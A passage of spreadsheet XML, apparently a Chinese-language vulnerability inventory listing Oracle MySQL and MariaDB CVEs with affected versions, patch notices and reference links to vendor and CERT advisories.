https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MKCJLNRK6RHFAHV7ZFD3XO7HNSBU3XOL/
https://usn.ubuntu.com/4195-1/
https://security.netapp.com/advisory/ntap-20191017-0002/
https://usn.ubuntu.com/4195-1/
https://usn.ubuntu.com/4195-2/
https://www.suse.com/support/update/announcement/2019/suse-su-20193311-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20193369-1.html
https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html
https://www.auscert.org.au/bulletins/ESB-2019.4373/
https://nvd.nist.gov/vuln/detail/CVE-2019-2938
https://packetstormsecurity.com/files/155420/Ubuntu-Security-Notice-USN-4195-2.html
https://www.auscert.org.au/bulletins/ESB-2019.4408/
https://www.auscert.org.au/bulletins/ESB-2020.0902/
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql/
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-oracle-mysql-vulnerabilities/
https://www.auscert.org.au/bulletins/ESB-2019.4683/
https://www.auscert.org.au/bulletins/ESB-2019.4773/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2019-2910)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201910-1008
http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
https://usn.ubuntu.com/4195-1/
https://security.netapp.com/advisory/ntap-20191017-0002/
https://usn.ubuntu.com/4195-1/
https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html
https://www.auscert.org.au/bulletins/ESB-2019.4373/
https://packetstormsecurity.com/files/155381/Ubuntu-Security-Notice-USN-4195-1.html
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql/
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-oracle-mysql-vulnerabilities/
https://nvd.nist.gov/vuln/detail/CVE-2019-2910</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2019-2911)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201910-1006
http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7X5D3O4TOQ57KL5FLQEXH2JB2UQYHCUZ/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6DTUCXX5XXPNPFV2PHP6IESGTCFMZOFP/
https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MKCJLNRK6RHFAHV7ZFD3XO7HNSBU3XOL/
https://usn.ubuntu.com/4195-1/
https://security.netapp.com/advisory/ntap-20191017-0002/
https://usn.ubuntu.com/4195-1/
https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html
https://nvd.nist.gov/vuln/detail/CVE-2019-2911
https://www.auscert.org.au/bulletins/ESB-2019.4373/
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql/
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-oracle-mysql-vulnerabilities/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-2577)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202010-625
https://usn.ubuntu.com/4250-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-2584)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202103-1556
https://usn.ubuntu.com/4250-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-2572)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202103-1608
https://usn.ubuntu.com/4250-1/</t>
  </si>
  <si>
    <t>Oracle MySQL/Maridb安全漏洞(CVE-2020-2574)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202011-1566
https://usn.ubuntu.com/4250-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 远程安全漏洞(CVE-2017-3456)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1319
https://mariadb.com/kb/en/library/mariadb-10031-changelog/
https://mariadb.com/kb/en/library/mariadb-1027-changelog/
https://mariadb.com/kb/en/library/mariadb-10123-changelog/</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-3458)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1317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</si>
  <si>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安全漏洞(CVE-2017-3461)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1314
https://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html#AppendixMSQL
http://riddle.link/
https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-55.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2017-3468)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1308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</si>
  <si>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Server安全漏洞（CVE-2019-2566）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-802
https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html#AppendixMSQL
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-27.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-731
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-744
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-781
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-728
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-766
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201902-956</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2592）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-766
https://support.f5.com/csp/article/K54470776
https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
http://www.oracle.com/index.html
http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
https://usn.ubuntu.com/3957-1/
https://access.redhat.com/errata/RHSA-2019:2484
https://access.redhat.com/errata/RHSA-2019:2511
https://usn.ubuntu.com/3957-1/
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-April-2019-29050
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connect-is-potentially-impacted-by-vulnerabilities-in-mysql/
https://www.oracle.com/technetwork/security-advisory/cpuapr2019verbose-5072824.html
https://www.auscert.org.au/bulletins/79866</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2018-3123）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201904-813
https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-43.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-1435
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-652
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-671
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-696
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-699
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-693
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-649
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-653</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-3822)</t>
  </si>
  <si>
    <t>ips-12031341, ips-12031342（无效）</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.26版本(含),8.0.0版本(含)到8.0.15版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html#AppendixMSQL</t>
  </si>
  <si>
    <t>https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html#AppendixMSQL
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-27.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2778)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-904
https://www.auscert.org.au/bulletins/ESB-2019.2784/</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2741)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-903
http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
http://www.oracle.com/index.html
https://support.f5.com/csp/article/K03444640
https://usn.ubuntu.com/4070-1/
https://vigilance.fr/vulnerability/Oracle-MySQL-vulnerabilities-of-July-2019-29795
https://www.auscert.org.au/bulletins/ESB-2019.3849/
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-impacted-by-multiple-vulnerabilities-in-oracle-mysql-2/
https://packetstormsecurity.com/files/153742/Ubuntu-Security-Notice-USN-4070-1.html
https://nvd.nist.gov/vuln/detail/CVE-2019-2741
https://www.ibm.com/support/pages/node/1078971
https://www.auscert.org.au/bulletins/ESB-2019.2784/</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件访问控制错误漏洞(CVE-2019-2797)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-901
https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html#AppendixMSQL
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-27.html</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2020-2570)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202011-1517
https://usn.ubuntu.com/4250-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Client 安全漏洞(CVE-2020-2573)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202101-2364
https://usn.ubuntu.com/4250-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB  安全漏洞(CVE-2021-2007)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle------Oracle已经为此发布了一个安全公告（2021-01-19）以及相应补丁:2021-01-19：Oracle Critical Patch Update Advisory - January 2021链接：https://www.oracle.com/security-alerts/cpujan2021.htmlMariadb------目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://mariadb.com/kb/en/security/</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2021-2001)</t>
  </si>
  <si>
    <t>影响mysql:5.6.0版本(含)到5.6.50版本(含),5.7.0版本(含)到5.7.30版本(含),8.0.0版本(含)到8.0.17版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2021-2010)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle已经为此发布了一个安全公告（2021-01-19）以及相应补丁: 2021-01-19：Oracle Critical Patch Update Advisory - January 2021, 链接：https://www.oracle.com/security-alerts/cpujan2021.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2166)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2226)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞（CVE-2021-21467）</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2174)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2171)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2154)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.33版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2019-15601)</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2019-1547)</t>
  </si>
  <si>
    <t>影响MySql:5.6.0版本(含)到5.6.46版本,5.7.0版本(含)到5.7.26版本,8.0.0版本(含)到8.0.18版本</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-1967)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2020.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞(CVE-2019-17543)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.oracle.com/security-alerts/cpujul2021.html</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2021.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17543</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞(CVE-2021-22901)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2021.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22901</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞（CVE-2021-2385）</t>
  </si>
  <si>
    <t>厂商补丁:链接：https://www.oracle.com/security-alerts/cpujul2021.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞（CVE-2021-23890）</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-35604)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2022-21303)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2022-21304)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2022-21367)</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</si>
  <si>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https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_38196&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server拒绝服务漏洞(CVE-2017-3460)</t>
  </si>
  <si>
    <t>5.7.0≤Oracle MySQL≤5.7.17</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</si>
  <si>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https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_38117&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>5.7.0≤Oracle MySQL Server≤5.7.18</t>
  </si>
  <si>
    <t>http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_31320&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>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
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_33894&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>MySQL安全漏洞（CVE-2021-22947）</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2021-22947</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2021-22923)</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2021-22923</t>
  </si>
  <si>
    <t>Oracle MySQL/MariaDB Packaging (OpenSSL)安全漏洞(CVE-2022-0778)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.37版本(含),8.0.0版本(含)到8.0.28版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2022-21589)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到8.0.16版本(含),5.7.0版本(含)到5.7.39版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2022-21595)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到8.0.27版本(含),5.7.0版本(含)到5.7.36版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2022-21608)</t>
  </si>
  <si>
    <t>影响mysql:8.0.0版本(含)到8.0.30版本(含),5.7.0版本(含)到5.7.39版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2022-21617)</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2023-21840)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.40版本(含)</t>
  </si>
  <si>
    <t>MySQL 拒绝服务漏洞(CVE-2023-21912)</t>
  </si>
  <si>
    <t>影响Mysql：5.7.0版本(含)至5.7.41版本(含)，8.0.0版本(含)至8.0.30版本(含)</t>
  </si>
  <si>
    <t>目前官方已经发布了新版本以解决此漏洞，获取链接：https://downloads.mysql.com/archives/installer/</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpuapr2023.html
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2023_00872&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2778)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1243
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2780)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1241
http://www.securitytracker.com/id/1040698</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2758)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1262
http://www.securitytracker.com/id/1040698</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2782)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1239
http://www.securitytracker.com/id/1040698</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3065)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1366
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-23.html
https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1525
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1361
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1365</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3056)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1374
https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-12.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1353
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1352
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1358
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1351
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1349
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1364
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1366
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1367
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1357
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1369
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1371
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1354</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3066)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1365
https://www.debian.org/security/2018/dsa-4341
https://access.redhat.com/errata/RHSA-2019:1258
https://lists.debian.org/debian-lts-announce/2018/08/msg00036.html
http://www.securitytracker.com/id/1041294
https://access.redhat.com/errata/RHSA-2019:2327
https://lists.debian.org/debian-lts-announce/2018/11/msg00004.html
https://usn.ubuntu.com/3725-2/
https://usn.ubuntu.com/3725-1/
https://access.redhat.com/errata/RHSA-2018:3655
http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://security.netapp.com/advisory/ntap-20180726-0002/
https://www.suse.com/support/update/announcement/2019/suse-su-20192048-1.html
https://access.redhat.com/errata/RHSA-2019:1258
https://www.suse.com/support/update/announcement/2019/suse-su-20191441-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20190628-1.html
https://access.redhat.com/errata/RHSA-2019:2327
https://www.suse.com/support/update/announcement/2019/suse-su-20190555-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20190555-1/
https://www.auscert.org.au/bulletins/ESB-2019.2967/
https://www.auscert.org.au/bulletins/ESB-2019.0874.2/
https://packetstormsecurity.com/files/153920/Red-Hat-Security-Advisory-2019-2327-01.html
https://www.auscert.org.au/bulletins/76786
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://www.auscert.org.au/bulletins/ESB-2019.2926/
https://www.auscert.org.au/bulletins/76662
https://www.auscert.org.au/bulletins/77326</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞（CVE-2018-2767）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1525
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-23.html
https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3277)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-819
https://usn.ubuntu.com/3799-1/
https://access.redhat.com/errata/RHSA-2018:3655
http://www.securitytracker.com/id/1041888
https://security.netapp.com/advisory/ntap-20181018-0002/
https://access.redhat.com/errata/RHSA-2019:1258
http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://security.gentoo.org/glsa/201908-24
https://access.redhat.com/errata/RHSA-2019:1258
https://www.suse.com/support/update/announcement/2019/suse-su-20191441-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20190628-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20190555-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20190555-1/
https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.0874.2/
https://www.auscert.org.au/bulletins/76786
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://www.auscert.org.au/bulletins/76662
https://www.auscert.org.au/bulletins/77326</t>
  </si>
  <si>
    <t>Oracle MySQL/MariaDB 组件安全漏洞(CVE-2018-3174)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-917
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3282
https://lists.askmonty.org/cgi-bin/mailman/listinfo/announce
https://mariadb.org/mariadb-10-0-37-now-available/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3174
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3143
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9843
https://jira.mariadb.org/browse/MDEV-17531
https://jira.mariadb.org/browse/MDEV-16465
https://mariadb.com/kb/en/mdb-10037-rn
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3251
https://jira.mariadb.org/browse/MDEV-16865
https://jira.mariadb.org/browse/MDEV-12547
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3156
https://jira.mariadb.org/browse/MDEV-17532
https://jira.mariadb.org/browse/MDEV-17533
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-935
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-948
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-844</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3278)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-818
https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-42.html
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-935
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-948
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-814
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-917</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3283)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-813
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-24.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-935
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-936
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-920
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-918
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-917
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-818
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-820
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-819
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-958
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-844
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-812</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3155)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-936
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-24.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-935</t>
  </si>
  <si>
    <t>Oracle MySQL Server Client programs组件安全漏洞（CVE-2018-3081）</t>
  </si>
  <si>
    <t>影响MySQL:5.5.0版本(含)到5.5.60版本(含),5.6.0版本(含)到5.6.40版本(含),5.7.0版本(含)到5.7.22版本(含),8.0.0版本(含)到8.0.11版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1350
https://lists.debian.org/debian-lts-announce/2018/11/msg00004.html
https://usn.ubuntu.com/3725-2/
https://usn.ubuntu.com/3725-1/
https://access.redhat.com/errata/RHSA-2018:3655
https://www.debian.org/security/2018/dsa-4341
https://access.redhat.com/errata/RHSA-2019:1258
http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://security.netapp.com/advisory/ntap-20180726-0002/
http://www.securitytracker.com/id/1041294
https://access.redhat.com/errata/RHSA-2019:2327
https://access.redhat.com/errata/RHSA-2019:1258
https://access.redhat.com/errata/RHSA-2019:2327
https://www.auscert.org.au/bulletins/ESB-2019.2967/
https://packetstormsecurity.com/files/153920/Red-Hat-Security-Advisory-2019-2327-01.html
https://www.auscert.org.au/bulletins/ESB-2019.1829/</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2534）</t>
  </si>
  <si>
    <t>https://security.netapp.com/advisory/ntap-20190118-0002/
https://access.redhat.com/errata/RHSA-2019:2484
http://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
https://usn.ubuntu.com/3867-1/
https://access.redhat.com/errata/RHSA-2019:2511
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://packetstormsecurity.com/files/154103/Red-Hat-Security-Advisory-2019-2511-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2531）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-693
https://security.netapp.com/advisory/ntap-20190118-0002/
https://access.redhat.com/errata/RHSA-2019:2484
http://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
https://usn.ubuntu.com/3867-1/
https://access.redhat.com/errata/RHSA-2019:2511
https://www.auscert.org.au/bulletins/ESB-2019.3142/
https://www.auscert.org.au/bulletins/80370
https://packetstormsecurity.com/files/154103/Red-Hat-Security-Advisory-2019-2511-01.html
https://www-01.ibm.com/support/docview.wss?uid=ibm10883622</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2420）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-632
https://security.netapp.com/advisory/ntap-20190118-0002/</t>
  </si>
  <si>
